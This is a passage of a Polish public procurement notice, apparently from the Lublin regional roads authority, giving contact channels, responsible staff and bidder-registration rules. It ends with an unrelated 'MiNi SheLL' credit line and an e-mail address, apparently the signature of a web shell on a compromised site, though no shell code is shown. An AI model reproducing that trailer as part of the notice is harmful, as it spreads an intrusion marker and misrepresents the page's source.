<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Oświadczenia, wnioski, zawiadomienia oraz informacje Zamawiający i Wykonawcy przekazują za pomocą faksu nr (081) 749-53-41; (081) 749-53-77 lub drogą elektroniczną na adres e-mail: dzp@zdw.lublin.pl. Jeżeli Zamawiający lub Wykonawca przekazują oświadczenia, wnioski, zawiadomienia oraz informacje faksem lub drogą elektroniczną, każda ze stron na żądanie drugiej niezwłocznie potwierdza fakt ich otrzymania. Osoby uprawnione do porozumiewania się z wykonawcami: 1. W zakresie przedmiotu zamówienia - Wydział Budowy, inż. Jan Bolibok, tel. (0-81) 749-53-25, 2. W sprawach formalno-prawnych związanych z postępowaniem o udzielenie zamówienia i zawarciem umowy - Wydział Umów, Sławomir Szepietowski, tel. (081) 749-53-44; 749-53-29. UWAGA: Wykonawcy, którzy uzyskają niniejszą specyfikację ze strony internetowej zamawiającego lub w inny sposób i zamierzają ubiegać się o udzielenie zamówienia, proszeni są o przesłanie krótkiej informacji faksem (0-81) 749-53-77 lub pocztą elektroniczną na adres dzp@zdw.lublin.pl zawierającej podstawowe dane firmy (nazwa, adres, numer tel. i faksu, adres poczty elektronicznej). Wykonawcy, którzy zgłoszą w ten sposób zamiar ubiegania się o udzielenie zamówienia będą przez Zamawiającego indywidualnie (bezpośrednio) zawiadamiani o np.: zapytaniach, wyjaśnieniach i zmianach dotyczących specyfikacji istotnych warunków zamówienia, zwołaniu przez Zamawiającego zebrania wszystkich wykonawców, przedłużeniu terminu składania ofert...</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com